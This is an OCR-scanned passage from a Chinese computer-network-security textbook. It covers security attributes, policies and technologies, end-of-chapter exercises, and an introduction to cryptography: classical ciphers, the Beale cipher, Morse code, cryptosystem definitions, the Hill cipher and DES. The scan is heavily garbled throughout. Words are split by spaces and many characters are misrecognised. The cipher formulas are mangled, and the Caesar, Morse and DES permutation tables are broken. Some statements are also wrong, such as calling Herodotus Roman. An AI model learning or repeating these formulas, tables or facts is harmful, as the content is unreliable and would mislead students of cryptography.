立 (健全 ) 安 全 意识 、 强 化 管理 更 为 重要 。 


1.4.2 ”安全 属性 


安全 属性 的 相关 术语 及 其 含义 如 下 。 

保密 性 /机 密 性 : 信息 的 内 容 不 被 未 授权 的 人 获取 。 

数据 完整 性 ， 数据 传输 或 存储 过 程 中 不 被 未 授权 的 算 改 或 破坏 。 
可 用 性 : 即便 是 在 故障 或 受 攻击 时 也 能 提供 有 效 的 服务 。 
真实 性 : 通信 双方 的 身份 ， 消 息 的 来 源 应 该 真实 。 

授权 与 访问 控制 : 合法 的 用 户 ， 有 不 同 的 访问 权限 。 

抗 抵赖 /不 可 否认: 交易 双方 任何 人 不 能 否认 已 经 发 生 的 交易 。 
可 追查 性 ， 可 以 追踪 到 消息 的 来 源 (责任 人 )。 

可 生存 性 / 抗 毁 性 : 在 部 分 被 摧毁 的 情况 下 ， 其 余 的 部 分 还 能 够 维持 运转 。 
私密 性 /隐私 : 个 人 的 隐私 信息 (比如 上 网 记录 ) 不 被 泄露 。 

可 控 性 : 对 不 良 信息 进行 屏蔽 的 能 力 。 


1.4.3 ”如 何 实现 网 络 安全 


1. 什么 是 安全 政策 


安全 政策 是 一 个 组 织 为 了 实现 其 业务 目标 而 制定 的 一 组 规定 ， 用 来 规范 用 户 的 行为 ， 
指导 信息 资源 的 保护 和 管理 。 

安全 政策 应 该 表现 为 一 份 或 一 系列 正式 的 文档 。 

安全 政策 规定 了 用 户 什么 是 该 做 的 、 什 么 是 不 该 做 的 。 


2. 安全 政策 举例 


校园 网 安全 政策 举例 : 

@@ XX 大 学 计算 机 信息 系统 及 校园 网 安全 与 保密 管理 暂行 规定 。 
@ AUP(Accessible Usage Policy)， 入 网 协议 。 

@ ”防火墙 政 策 。 

@ 口令 政策 。 


1.5 ”网 络 安全 技术 
1.5.1 网 络 安全 基本 要 素 


1. 双向 身份 认证 
双方 通信 前 证 明 对 方 的 身份 与 其 声明 的 一 致 ， 建 立 带 有 一 定 保障 级 别 的 实体 身份 。 
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2. 访问 控制 授权 

对 不 同 用 户 设置 不 同 的 存 取 权限 ， 把 证 实 的 实体 与 存 取 控制 机 制 匹 配 ， 保 证 只 允许 访 
问 授权 资源 。 

3. 加 密 算法 

它 是 将 数据 转化 为 另 一 种 形式 ， 不 具有 密 钥 的 其 他 人 不 能 解读 数据 ， 是 信息 安全 的 核 
心 内 容 。 

. 完整 性 检测 

确保 信息 在 传输 过 程 中 不 被 算 改 ， 包 括 变动 、 插 入 、 删 除 、 复 制 ， 以 及 序列 号 的 改 
变 和 重 置 。 

5. 不 可 否认 性 

证 明 一 条 消息 已 被 发 送 和 接收 ， 保 证 发 送 方 和 接收 方 都 有 能 力 证 明 接收 和 发 送 操作 确 
实 发 生 了 ， 并 能 确定 发 送 和 接收 者 的 身份 。 数 字 签名 的 认证 特性 ， 可 以 提供 不 可 否认 性 。 

6. 可 靠 性 保护 

通信 内 容 不 被 他 人 捕获 ， 不 会 有 敏感 信息 泄密 ， 主 要 通过 数据 传输 加 密 技术 实现 。 

7. 数据 隔离 


防止 数据 泄露 ， 不 允许 秘密 的 数据 流入 到 非 机 密 网 络 中 ， 如 利用 路 由 控制 中 的 安全 标 
记 转 发 下 包 ， 防 火 墙 扫 描 E-mail 消息 中 “敏感 语言 ”防止 其 释放 到 局 域 网 中 等 。 


1.5.2 网络 安全 技术 


(1) 身份 识别 与 认证 技术 : 防止 用 户 、 服 务 器 、 机 器 之 间 的 欺骗 和 抵赖。 

(2) 数据 加 密 技术 : 防止 被 非法 窃取 。 

(3) 数字 签名 技术 : 防止 信息 被 假冒 、 算 改 和 抵赖 。 

(4) 访问 控制 技术 : 防止 用 户 越权 访问 数据 和 使 用 资源 。 

(5) 安全 管理 技术 : 负责 用 户 密 钥 管 理 、 公 证 和 仲裁 。 

(6) 安全 审计 技术 : 对 系统 中 的 用 户 操作 做 日 志和 记录 。 

(7) 灾难 恢复 技术 : 一 旦 系统 出 现 问题 ， 可 对 进行 系统 恢复 。 

(8) 防 病毒 技术 : 防范 并 抵挡 病毒 的 侵害 ， 保 护 系统 的 安全 。 

(9) 边界 安全 技术 : 采用 防火 墙 等 技术 对 非法 用 户 或 站 点 的 访问 进行 控制 。 

(10) 入 侵 报警 技术 : 对 于 非法 进入 或 试图 非法 进入 设防 区 域 (或 系统 ) 的 行业 予以 探测 
并 指示 ， 处 理 并 发 出 报警 信息 。 


本 章 小 结 
本 章 在 对 网 络 安全 现状 进行 概述 性 介绍 的 基础 上， 重点 讲述 了 目前 最 为 常见 的 网 络 威 
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胁 及 网 络 攻 击 手段 ， 重 点 阐述 了 网 络 安 全 的 特点 、 属 性 及 构成 安全 网 络 的 基本 要 素 ， 并 对 
如 何 实 现 网 络 安全 进行 了 简要 介绍 。 


习 题 
一 、 选 择 题 
1. 网络 安 全 的 特征 包括 (  )。 
A. 机 密 性 B. 完整 性 C. 可 用 性 
D. 可 控 性 E. 可 审查 性 


2. 网 络 攻击 的 种 类 包括 ( 。 )。 
A. 主动 攻击 B. 被 动 攻击 C. 可 用 性 攻击 ”了 D. 恶意 攻击 
3. “确保 信息 在 传输 过 程 中 不 被 得 改 ， 包 括 变动 、 插 入 、 删 除 、 复 制 ， 以 及 序列 号 
的 改变 和 重 置 ”是 属于 网 络 安全 (  ) 和 要素。 


A. 双向 身份 认证 B. 完整 性 检测 
C. 不 可 否认 性 D. 数据 隔离 
4. ”信息 安全 技术 包括 ( 。 )。 
A. 数据 加 密 技术 B. 数字 签名 技术 
C. 访问 控制 技术 D. 安全 审计 技术 
二 、 简 答题 


1. 国际 标准 化 组 织 (ISO) 对 计算 机 网 络 安全 的 定义 是 什么 ? 
2. 网 络 安全 的 特点 有 哪些 ? 
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【项 目 要 点 】 


@ 公 钥 和 私 钥 密码 体制 。 

@ 数字 签名 。 

@ 数字 证 书 。 

@ ”身份 认证 。 

【学 习 目 标 】 

掌握 密码 学 的 有 关 概 念 。 

了 解 常见 的 古典 密码 加 密 技 术 。 

掌握 对 称 加 密 算法 和 公开 密 钥 算法 在 网 络 安全 中 的 具体 应 用 。 
掌握 数字 签名 技术 、 数 字 证 书 技术 的 实际 应 用 。 
掌握 Hash 算法 的 原理 及 应 用 。 

掌握 PGP 加 密 系 统 的 工作 原理 以 及 各 种 典型 应 用 。 


2.1 密码 学 基础 


密码 学 是 一 门 既 古老 又 新 兴 的 学 科 ， 它 自古 以 来 就 在 军事 和 外 交 舞 台 上 担当 着 重要 角 
色 。 长 期 以 来 ， 密 码 技术 作为 一 种 保密 手段 ， 本 身 也 处 于 秘密 状态 ， 只 被 少数 人 或 组 织 掌 
握 。 随 着 计算 机 网 络 和 计算 机 通信 技术 的 发 展 ， 计 算 机 密码 学 得 到 了 前 所 未 有 的 重视 并 迅 
速 普及 和 发 展 起 来 ， 它 已 经 成 为 计算 机 安全 领域 主要 的 研究 方向 。 


2.1.1 加密 的 起 源 


早 在 4000 多 年 以 前 ， 在 古 埃及 的 尼罗河 畔 ， 一 位 擅长 书写 者 在 贵族 的 墓碑 上 书写 铭 
文 时 有 意 用 变形 的 象形 文字 而 不 是 普通 的 象形 文字 来 撰写 铭文 ， 这 是 史 载 的 最 早 的 密码 
形式 。 

罗马 “历史 之 父 ” 希 罗 多 德 以 编 年 史 的 形式 记载 了 公元 前 5 世纪 希腊 和 波斯 间 的 冲 
突 ， 其 中 介绍 到 正 是 由 一 种 叫 隐 写 术 的 技术 才 使 希腊 免 遭 波斯 暴君 薛 西 斯 一 世 征 服 的 厄 
运 。 薛 西 斯 做 了 足 足 5 年 的 战争 准备 ， 计 划 于 公元 前 480 年 对 希腊 发 动 一 场 出 其 不 意 的 进 
攻 。 但 是 波斯 的 蠢 春野 心 被 一 名 逃亡 在 外 的 希腊 人 德 马 拉 图 斯 注意 到 了 ， 他 决定 给 斯 巴 达 
带 去 消息 以 告诫 他 们 薛 西 斯 的 侵犯 企图 。 可 问题 是 消息 该 怎样 送出 而 不 被 波斯 士兵 发 现 。 
他 利用 一 副 已 上 螨 的 可 折 且 刻写 板 ， 先 将 消息 刻写 在 木板 的 背面 ， 再 涂 上 螨 盖 住 消息 ， 这 
样 刻 写 板 看 上 去 没 写 任何 字 。 最 终 希 腊 人 得 到 了 消息 ， 并 提前 做 好 了 战争 准备 ， 致 使 套 西 
斯 的 侵略 妄想 破灭 。 德 马 拉 图 斯 的 保密 做 法 与 中 国 古 人 有 异曲同工 之 妙 。 中 国 古 人 将 信息 
写 在 小 块 丝 绸 上 ， 塞 进 一 个 小 球 ， 再 用 蜡 封 上 ， 然 后 再 让 信使 吞 下 这 个 蜡 球 以 保证 消息 
安全 。 

最 早 将 现代 密码 学 概念 运用 于 实际 的 人 是 恺 撤 大 帝 ( 尤 利 乌 斯 。 恺 撤 ， 公 元 前 100 年 一 
前 44 年 )。 他 不 相信 负责 他 和 他 手下 将 领 通 信 的 传令 官 ， 因 此 他 发 明了 一 种 简单 的 加 密 算 
法 将 信件 加 密 ， 后 来 被 称 为 “ 恺 撤 密码 (也 称 凯 撤 密码 )”。 当 恺 撤 说 : “Hw wx， 
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Euxwh! ”而 不 是 “Et tu，Bmte! ”(“ 你 这 畜生 ! ”) 时 ， 他 的 心腹 会 懂得 他 的 意思 。 值 
得 注意 的 是 ， 大 约 2000 年 后 ， 联 邦 将 军 A.S 约翰逊 和 皮 埃 尔 。 博 雷 加 德 在 希 洛 战 斗 中 再 
次 使 用 过 这 种 简易 密码 。 恺 撤 密 码 是 将 字母 按 字母 表 的 顺序 排列 ， 并 且 最 后 一 个 字母 与 第 
一 个 字母 相连 。 加 密 方法 是 将 明文 中 的 每 个 字母 用 其 后 面 的 第 3 个 字母 代替 ， 就 变 成 了 密 
文 。 一 般 ， 明 文 使 用 小 写字 母 ， 密 文 使 用 大 写字 母 。 例 如 : 


和 





届 撤 密码 是 
PHHWDW WROQAOLJIKVW 
以 英文 为 例 ， 恺 撤 密码 的 代替 表 如 表 2-1 所 示 。 


表 2-1 恺 撤 密码 代替 表 


月 晤 | 二 | 调和 | 二 | | | 证 外 和 | 二 ,| 于 | 证 
密 文 In |o | 


明文 
lo lr [slr [ulyv lw lx lv lz [a ls Te 





密 文 


千 百 年 来 ， 人 们 运用 自己 的 智慧 创造 出 形形色色 的 编写 密码 的 方法 ， 下 面 介绍 几 种 简 
易 的 密码 方案 。 

例如 ， 给 出 密 文 

KCATTA WON 
你 能 猜 出 它 是 什么 意思 吗 ? 我 们 只 要 将 每 个 单词 倒 过 来 读 ， 就 会 迅速 恢复 明文 
attack now 

在 美国 南北 战争 时 期 ， 军 队 中 曾经 使 用 过 下 述 “双轨 ” 式 密码 ， 加 密 时 先 将 明文 写成 
双轨 的 形式 ， 例 如 将 attack now 写成 

a t c n WwW 
tt a 6 
然后 按 行 的 顺序 书写 即 可 得 出 密 文 
ATCNWTAKO 

解密 时 ， 先 计算 密 文 中 字母 的 总 数 ， 然 后 将 密 文 分 成 两 半 ， 排 列 成 双轨 形式 后 按 列 的 
顺序 读 出 即 可 恢复 明文 。 

在 第 一 次 世界 大 战 期 间 ， 德 国 间谍 曾经 依靠 字典 编写 密码 。 例 如 100-3-16 表示 某 字 典 
的 第 100 页 第 3 段 的 第 16 个 单词 。 但 是 ， 这 种 加 密 方法 并 不 可 靠 ， 美 国情 报 部 门 搜集 了 
所 有 德 文字 典 ， 只 用 了 几 天 时 间 就 找 出 了 德 方 所 用 的 那 一 本 ， 从 而 破译 了 这 种 密码 ， 给 德 
军 造成 了 巨大 损失 。 

上 面 介绍 了 几 种 简易 的 密码 形式 ， 这 些 早期 的 密码 多 数 应 用 于 军事 、 外 交 、 情 报 等 敏 
感 的 领域 。 由 于 军事 、 外 交 和 情报 等 方面 的 需要 ， 刺 激 了 密码 学 的 发 展 。 密 码 编写 得 好 与 
坏 ， 有 时 会 产生 重大 的 、 甚 至 决定 性 的 影响 。 例 如 ， 第 二 次 世界 大 战 期 间 ， 英 国情 报 部 门 
在 一 些 波兰 人 的 帮助 下 ， 于 1940 年 破译 了 德国 直至 1944 年 还 自 认 为 是 可 靠 的 Enigma 密 
码 系统 ， 使 德 方 遭受 重大 损失 。 











/15N. 


non 区 >》 计算 机 网 络 安全 教程 


计算 机 的 出 现 ， 大 大 地 促进 了 密码 学 的 变革 ， 正 如 德国 学 者 TBeth 所 说 : “突然 ， 现 
代 密 码 学 从 半 军 事 性 的 角落 里 解脱 出 来 ， 一 跃 成 为 通信 科学 一 切 领域 中 的 中 心 研究 课 
题 。” 由 于 商业 应 用 和 大 量 计算 机 网 络 通信 的 需要 ， 人 们 对 数据 保护 、 数 据 传输 的 安全 性 
越 来 越 重视 ， 这 更 大 地 促进 了 密码 学 的 发 展 与 普及 。 

密码 学 的 发 展 大 致 可 分 以 下 几 个 阶段 : 

第 一 阶段 : 从 古代 到 1949 年 。 这 一 时 期 ， 密 码 学 家 往往 赁 直觉 设计 密码 ， 缺 少 严格 
的 推理 证 明 。 这 一 阶段 设计 的 密码 称 为 古典 密码 。 

第 二 阶段 : 从 1949 一 1975 年 。 这 一 时 期 发 生 了 两 个 比较 大 的 事件 : 1949 年 信息 论 大 
师 香农 (C. E. Shannon) 发 表 了 《保密 系统 的 信息 理论 》 一 文 ， 为 密码 学 奠定 了 理论 基础 ， 
使 密码 学 成 为 一 门 真 正 的 科学 ; 1970 年 由 IBM 研究 的 密码 算法 DES 被 美国 国家 标准 局 宣 
布 为 数据 加 密 标 准 ， 这 打破 了 对 密码 学 研究 和 应 用 的 限制 ， 极 大 地 推动 了 现代 密码 学 的 
发 展 。 

第 三 阶段 ， 从 1976 年 至 今 。1976 年 Diffie 和 Hellman 发 表 的 《密码 学 的 新 方向 》 一 
文 开创 了 公 钥 密码 学 的 新 纪元 ， 在 密码 学 的 发 展 史上 具有 里 程 碑 的 意义 。 


【知识 拓展 一 一 比尔 密码 之 谜 】 


1820 年 1 月 ， 一 卫生 人 骑马 来 到 弗吉尼亚 林 奇 堡 的 华盛顿 旅馆 。 陌 生 人 自我 介绍 说 他 
叫 托马斯 。 杰 弗 逊 。 比 尔 。 那 年 的 3 月 底 ， 他 一 声 不 响 地 离开 了 这 家 旅馆 ， 给 旅馆 老板 莫 
里 斯 留 下 了 一 个 锁 着 的 铁 盒 。 

英里 斯 直到 1845 年 才 打开 那个 盒子 。 他 在 里 面 发 现 了 两 封 写 给 他 的 信和 3 张 写 满 数 
字 的 纸 。 在 信 中 ， 比 尔 详细 叙述 了 他 与 他 的 伙伴 在 冒险 活动 中 所 发 现 的 巨 量 黄 金 ， 并 把 它 
们 藏 在 贝 德 福 德 县 的 布 法 德 酒馆 附近 的 一 个 山洞 里 。 信 中 写 道 ， 那 3 张 难以 理解 的 文件 如 
用 特定 的 密 钥 破 译 出 ， 就 会 揭示 出 隐藏 处 的 确切 地 点 、 贮 藏 处 具体 所 藏 之 物 以 及 30 个 冒 
险 家 的 姓名 和 地 址 。 

盒子 中 的 东西 无 疑 勾 起 了 英里 斯 的 好 奇 心 。 莫 里 斯 在 其 一 生 余下 的 19 年 中 致力 于 发 
现 财宝 ， 但 由 于 没有 那 份 神秘 文件 的 密 钥 而 不 能 有 任何 进展 。 在 他 临终 前 的 1863 年 ， 他 
把 那 只 盒子 的 事 告诉 了 雇 姆 斯 。 沃 德 。 沃 德 起 初 同样 对 密码 一 筹 莫 展 ， 直 到 他 灵光 一 现 ， 
想到 要 用 《独立 宣言 》 作 为 密 钥 ， 从 而 破译 了 比尔 密码 的 第 二 页 ， 推 断 出 下 列 一 段 文字 : 
“我 在 离 布 法 德 约 4 英里 处 的 贝 德 福 德 县 里 的 一 个 离 地 面 6 英尺 深 的 洞穴 或 地 容 中 贮藏 了 
下 列 物 品 ， 这 些 物品 为 各 队员 一 一 他 们 的 名 字 在 后 面 第 三 张 纸 上 一 一 公有 。 第 一 容 藏 有 
1014 磅 金子 ，3812 磅 银子 ， 藏 于 1819 年 11 月 。 第 二 容 藏 有 1907 磅 金子 ，1288 磅 银子 ， 
另 有 在 圣 路 易 为 确保 运输 而 换 得 的 珠宝 ….…” 

这 上段 文字 极 大 地 激发 起 沃 德 的 兴趣 ， 他 耗 尽 终生 去 破译 其 余 密 码 ， 却 一 无 所 获 。 

20 世纪 60 年 代 ， 一 些 密码 分 析 界 最 富 智 慧 的 人 组 成 了 一 个 秘密 协会 一 一 比尔 密码 协 
会 ， 他 们 倾 其 知识 和 才智 去 发 现 那 堆 难 以 捉摸 的 财富 。 计 算 机 科学 家 、 电 脑 密 码 统计 性 分 
析 的 先驱 卡尔 。 哈 默 就 是 该 协会 的 一 位 著名 成 员 ， 他 对 比尔 文件 中 的 数字 的 分 布 做 了 大 量 
统计 、 试 验 ， 总 结 得 出 : 这 些 数 字 并 不 是 随意 写 出 的 ， 它 一 定 隐 含 着 一 段 英文 信息 。 

虽然 越 来 越 多 的 数学 家 从 事 密码 学 研究 ， 越 来 越 多 的 巨型 计算 机 被 用 来 编制 和 破译 密 
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码 ， 但 一 个 半 世 纪 前 写成 的 比尔 密码 一 一 它 暗 示 在 某 个 地 方 藏 有 1700 万 美元 的 财富 ， 依 然 
耗 去 了 “美国 最 有 能 耐 的 密码 分 析 家 至 少 10% 的 精力 ”。 时 至 今日 ， 比 尔 密码 仍然 是 一 
个 迹 。 
【知识 拓展 一 一 摩 斯 密码 】 

摩尔 斯 电码 (又 译 为 摩 斯 密码 ，Morse code) 是 一 种 时 通 时 断 的 信号 代码 ， 通 过 不 同 的 排 
列 顺序 来 表达 不 同 的 英文 字母 、 数 字 和 标点 符号 。 它 由 美国 人 艾 尔 菲 德 .维尔 于 1837 年 
发 明 。 摩 尔 斯 电码 是 一 种 早期 的 数字 化 通信 形式 ， 但 是 它 不 同 于 现代 只 使 用 0 和 1 两 种 状 
态 的 二 进 制 代 码 ， 它 的 代码 包括 5 种 : 点 、 划 、 点 和 划 之 间 的 停顿 、 每 个 字符 间 短 的 停顿 
(在 点 和 划 之 间 )、 每 个 词 之 间 中 等 的 停顿 以 及 句子 之 间 长 的 停顿 。 















































摩尔 斯 电码 表 

于 电码 符号 3 电码 符号 反 生 电码 符号 
B |—= Ce 2 | 一 一 一 
C_ |—:— P | 一 一 3 三 三 
D |= 0 |——.— 4 三 
F R 一 5 | 

E 一 3 6 一 。。。。 

G |== T_ | 一 7 |= 一 

H U 一 8 上 二 一 

I V 三 9 ”上 二 三 二 
G 二 一 一 Ww | 一 一 0 [|= 一 一 一 一 
K 一 。 一 下 一 。，。 一 a 一 一 

正 一 一 。 一 一 A. 一 ee 一 
M 一 一 4 一 一 。。 〈( ) “| 一 。 一 一 。 一 


























2.1.2 ”密码 学 的 基本 概念 


密码 学 的 基本 目的 是 使 得 两 个 在 不 安全 信道 中 通信 的 人 一 一 称 为 A 和 B 一 一 以 一 种 使 
他 们 的 敌手 C 不 能 明白 和 理解 通信 内 容 的 方式 进行 通信 。 这 样 的 不 安全 信道 在 实际 中 是 普 
遍 存在 的 ， 比 如 电话 线 或 计算 机 网 络 。A 发 送 给 B 的 信息 ， 通 常 称 为 明文 (plaintext)， 即 明 
文 是 未 被 加 密 的 信息 ， 如 英文 单词 、 数 据 或 符号 。A 使 用 预先 商量 好 的 密 钥 (key) 对 明文 进 
行 加 密 ， 加 密 过 的 明文 称 为 密 文 (ciphertext)，A 将 密 文通 过 信道 发 送 给 B。 对 于 政 手 C 来 
说 ， 他 可 以 窃听 到 信道 中 A 发 送 的 密 文 ， 但 是 却 无 法 知道 其 所 对 应 的 明文 ， 而 对 于 接收 者 
B， 由 于 知道 密 钥 ， 可 以 对 密 文 进行 解密 ， 从 而 获得 明文 。 图 2-1 给 出 了 密码 通信 的 基本 


图 2-1 密码 通信 的 基本 过 程 


.IT 


Po 计算 机 网 络 安全 教程 


在 密码 通信 过 程 中 所 涉及 的 基本 概念 如 下 。 
明文 消息 (plaintext): 需要 变换 的 原 消息 。 简 称 明文 。 
密 文 消息 (ciphertext): 明文 经 过 变换 成 为 另 一 种 隐蔽 的 形式 。 简 称 密 文 。 
加 密 (encipher、encode): 完成 明文 到 密 文 的 变换 过 程 。 
解密 (decipher、decode): 从 密 文 恢复 出 明文 的 过 程 。 
加 密 算法 (cipher): 对 明文 进行 加 密 时 所 采用 的 一 组 规则 的 集合 。 
解密 算法 (cipher): 对 密 文 进行 解密 时 所 采用 的 一 组 规则 的 集合 。 
密码 算法 强度 : 对 给 定 密码 算法 的 攻击 难度 。 

@ 密 钥 (key): 加 解密 过 程 中 只 有 发 送 者 和 接收 者 知道 的 关键 信息 。 

密码 算法 是 指 用 于 加 密 和 解密 的 一 对 数学 函数 E(x) 和 D(x)。 研 究 如 何 构 造 密码 算法 ， 
使 窃听 者 在 合理 的 时 间 和 代价 下 不 能 破译 密 文 ， 以 获取 原始 明文 消息 的 理论 和 方法 称 为 密 
码 编码 学 。 与 之 对 应 的 ， 研 究 在 未 知 密码 算法 前 提 下 ， 对 获取 的 密 文 进行 分 析 、 破 解 ， 从 
中 获取 原始 明文 消息 的 理论 和 方法 称 为 密码 分 析 学 。 总 而 言 之 ， 密 码 学 = 密码 编码 学 + 密码 
分 析 学 。 

什么 是 密码 系统 呢 ? 以 恺 撤 密 码 为 例 ， 如 果 用 数字 0,1,2,…,24,25 分 别 和 字母 
A,B,C,…,Y,Z 相对 应 ， 如 表 2-2 所 示 。 


表 2-2 字母 与 数字 对 应 表 


a i | 
[ss [us ds Ti [ris Ty |» | |» |» |a 





则 密 文字 母 8 可 以 用 明文 字母 a 表示 如 下 : 
P=(at3)mod 26 (2-1) 
例如 ， 明 文字 母 为 c， 即 a=2 时 ， 
B=(2+3)mod 26=5 
因此 ， 密 文字 母 为 F。 
式 (2-1) 是 恺 撤 密 码 的 数学 形式 ， 也 表示 一 种 算法 ， 恺 撤 密码 系 统 即 由 式 (2-1) 和 其 中 密 
钥 3 组 成 。 我 们 不 知道 当时 恺 撤 为 什么 偏爱 数字 3， 他 其 实 可 以 选择 1 一 25 之 间 的 任何 一 
个 数字 作为 密 钥 。 因 此 ， 式 (2-1) 可 以 推广 成 
B=(athmod 26 (2-2) 
这 其 实 就 是 移 位 密码 。 这 里 ，kEK，K={1,2,3,…,24,25} 是 密 钥 集合 ， 或 称 密 钥 空间 。 
定义 2-1 一 个 密码 体制 是 满足 以 下 条 件 的 五 元 组 (P.C.K.E.D)， 满 足 条 件 : 
(1) 了 是 所 有 可 能 的 明文 组 成 的 有 限 集 (明文 空间 )。 
(2) C 是 所 有 可 能 的 密 文 组 成 的 有 限 集 ( 密 文 空间 )。 
(3) 天 是 所 有 可 能 的 密 钥 组 成 的 有 限 集 ( 密 钥 空间 )。 
(4) 任意 keEK， 有 一 个 加 密 算法 eeE 和 相应 的 解密 算法 dgED， 使 得 e 和 4 分 别 为 加 
密 和 解密 函数 ， 满 足 d(e(x))=x*， 这 里 xEP。 
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令 PC=K={1,2,3,…,25,26}。 对 0 三 k<25, 任 意 xyE {1,2,3,…,25,26}， 定 义 
eGD=CcHbmod 26 
以 及 
ad0)-O-Dmod 26 
算法 是 一 些 公式 、 法 则 或 程序 ， 规 定 明文 和 密 文 之 间 的 变换 方法 ， 密 钥 可 以 看 成 是 算 
法 中 的 参数 。 例 如 在 式 (2-2) 中 取 夺 3， 就 可 以 得 到 式 (2-1)， 即 恺 撤 密 码 。 如 果 取 本 25， 就 
可 以 得 出 下 述 美军 多 年 前 曾 使 用 过 的 一 种 加 密 算法 ， 即 通过 明文 中 的 字母 用 其 前 面 的 字母 
取代 形成 密 文 的 方法 。 例 如 ， 当 明文 是 
attacknow 
则 对 应 的 密 文 是 
ZSSZBJMNYV 
密码 体制 2-2 希 尔 密码 
设 m 宇 2 为 正 整数 ，P=C={1,2,3,…,25,26}”， 且 
KK={ 定 义 在 {1,2,3,…,25,26} 上 的 mxm 可 道 矩阵 } 
对 任意 的 密 钥 k， 定 义 加 密 变 换 
e(x)=xk 
解密 变换 
d0)= 


例如 选取 2x2 的 密 角 ， | | 


明文 mr- Hill 一 AS > | 小 | | 
1 


el nn 2 Ts 
加 和 过 程 cow | | | | EE 0 r 3 | mod20) 


1. .25 bz 
算法 是 相对 稳定 的 ， 我 们 不 能 想象 在 一 个 密码 系统 中 经 常 改变 加 密 算法 ， 在 这 种 意义 
上 可 以 把 算法 视 为 常量 。 反 之 ， 密 钥 则 是 一 个 变量 ， 我 们 可 以 根据 事前 约定 好 的 安排 ， 或 
者 用 过 若干 次 后 改变 一 个 密 钥 ， 或 者 每 过 一 段 时 间 更 换 一 次 密 钥 。 为 了 密码 系统 的 安全 ， 
频繁 更 换 密 钥 是 必要 的 。 由 于 种 种 原因 ， 算 法 往往 不 能 够 保密 ， 因 此 ， 我 们 常常 假定 算法 
是 公开 的 ， 真 正 需 要 保密 的 是 密 钥 ， 所 以 ， 在 分 发 和 存储 密 钥 时 应 当 特别 小 心 。 


2.1.3 ”对 称 密 钥 算 法 


对 称 密码 算法 又 称 为 传统 密码 算法 ， 加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 ， 反 过 来 也 
成 立 。 在 大 多 数 对 称 算法 中 ， 加 解密 的 密 钥 是 相同 的 。 典 型 的 对 称 密 钥 算法 是 DES、AES 
和 RC5 算法 。 实 际 上 ， 前 面 介 绍 的 古典 密码 (包括 移 位 密码 、 希 尔 密码 和 置换 密码 等 ) 也 可 
看 作 是 一 种 对 称 密 钥 算法 。 图 2-2 表示 了 对 称 密 钥 算法 的 基本 原理 。 


Rd 文 c-| 2 有 中 即 密 文 C-PBWZ 
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密 钥 : abchappy 
| 明文 上 | 加 客 密 广 
| 明文 | 解密 让 密 广 
密 钥 : ee 











2-2 ”对 称 密 钥 算 法 的 基本 原理 


明文 经 过 对 称 加 密 算法 处 理 后 ， 变 成 了 不 可 读 的 密 文 ( 即 乱码 )。 如 果 想 解读 原文 ， 则 
需要 使 用 同样 的 密码 算法 和 密 钥 来 解密 ， 即 信息 的 加 密 和 解密 使 用 同样 的 算法 和 密 钥 。 对 
称 密码 算法 的 优点 是 计算 量 小 、 加 密 速度 快 。 

对 于 对 称 密码 体制 来 说 ， 可 以 按照 对 明文 加 解密 的 方式 ， 将 其 分 为 序列 密码 (或 流 密码 ) 
和 分 组 密码 。 序 列 密码 是 将 明文 划分 成 字符 (如 单个 字母 )， 或 其 编码 的 基本 单元 (如 0、1 
数字 )， 逐 字符 进行 加 解密 。 分 组 密码 是 将 明文 编码 表示 后 的 数字 序列 划分 成 长 为 m 的 
组 ， 各 组 分 别 在 密码 的 控制 下 加 密 成 密 文 。 分 组 密码 模型 如 图 2-3 所 示 。 


密 钥 三 (ho.…,kr1) 密 钥 三 (ko…,kor1) 










密 文 
Yo...) 
明文 

(orl) 


明文 


(wo rl) 


2-3 分 组 密码 模型 


毫 无 疑问 ， 数 据 加 密 标准 (DES) 中 的 算法 是 第 一 个 并 且 也 是 最 重要 的 对 称 加 密 算法 。 
DES 算法 最 初 是 由 IBM 公司 在 1970 年 左右 开发 ，1977 年 被 美国 选 为 国家 标准 。 值 得 注意 
的 是 ，IBM 提交 的 候选 算法 密 钥 长 度 为 112， 但 是 美国 国家 安全 局 (NAS) 公 布 的 DES 算 
法 的 密 钥 长 度 为 56。 因 此 人 们 曾经 怀疑 DES 的 安全 强度 ，NAS 是 否 在 其 中 设置 了 陷 门 。 
但 无 论 如 何 ，DES 得 到 包括 金融 业 在 内 的 广泛 使 用 ， 同 时 对 DES 安全 性 的 研究 也 在 不 断 
继续 。 

DES 的 明文 分 组 长 度 为 64 位 ， 密 钥 长 度 为 56 位 ， 输 出 64 位 密 文 分 组 ， 其 加 密 算法 
框图 见 图 2-4。 图 的 左 部 是 明文 的 加 密 处 理 过 程 ， 该 过 程 分 为 3 个 阶段 。 

(1) 给 定 明文 了 通过 一 个 固定 的 初始 置换 人 P 来 排列 荆 中 的 位 ， 得 到 名 。 

Ko-IPOA)=LoRo 
其 中 Zo 由 总 前 32 位 组 成 ，Ro 由 总 的 后 32 位 组 成 。 
(2) 计算 函数 下 的 16 次 迭代 , 根据 下 述 规则 来 计算 CR 入 i 生 10)。 
LiFRi, RFLi ® KH (Ri Ki) 

其 中 到 是 长 为 48 位 的 子 密 钥 。 子 密 钥 及, 玫 ，…, Kie 是 作为 密 钥 K(56 位 ) 的 函数 而 计 
算出 的 。 

(3) 对 比特 串 RieLie 使 用 北 置 换 IP 得 到 密 文 了 。 


/20N. 


第 2 章 “数据 加 密 与 认证 仇 有 绅 


亚 =IP "(RieL16) 


输入 64 比 特 明文 数据 
初始 置换 IP 


在 密 钥 控制 下 
16 轮 和 欠 代 
初始 逆 置 换 IP- 
输出 64 比 特 密 文 数据 


2-4 ”DES 加 密 算法 框图 


DES 算法 中 的 初始 置换 IP 和 逆 置 换 IP7 由 表 2-3 给 出 。 
表 2-3 初始 置换 和 初始 逆 置换 














产生 16 个 密 钥 





初始 置换 IP 初始 逆 置 换 IP 
58 50 42 34 26 18 10 2 40 8 48 16 56 24 64 32 
60 52 44 36 28 20 12 4 :A ,~ ~ | 
62 54 46 38 30 22 14 6 38 6 46 14 54 22 62 30 
64 56 48 40 32 24 16 8 37 5 45 13 53 21 61 29 
57 49 41 33 25 17 9 1 36 4 44 12 52 20 60 28 
59 S51 43 35 27 19 11 3 .| | I .2 
61 53 45 37 29 21 13 5 34 2 42 10 50 18 58 26 
人 55 47 39 31 2 15 7 33 1 41 6 49 17 57 25 


DES 算法 的 每 次 迭代 中 ， 首 先 将 64 位 码 分 为 独立 的 左右 32 位 Ri1、Li1， 该 轮 处 理 的 
总 体 效果 是 LFRi1, RFLi1@@ 了 F(R Ki)， 其 中 的 F(R Ei) 称 为 轮 函数 或 下 函数， 处理 细节 
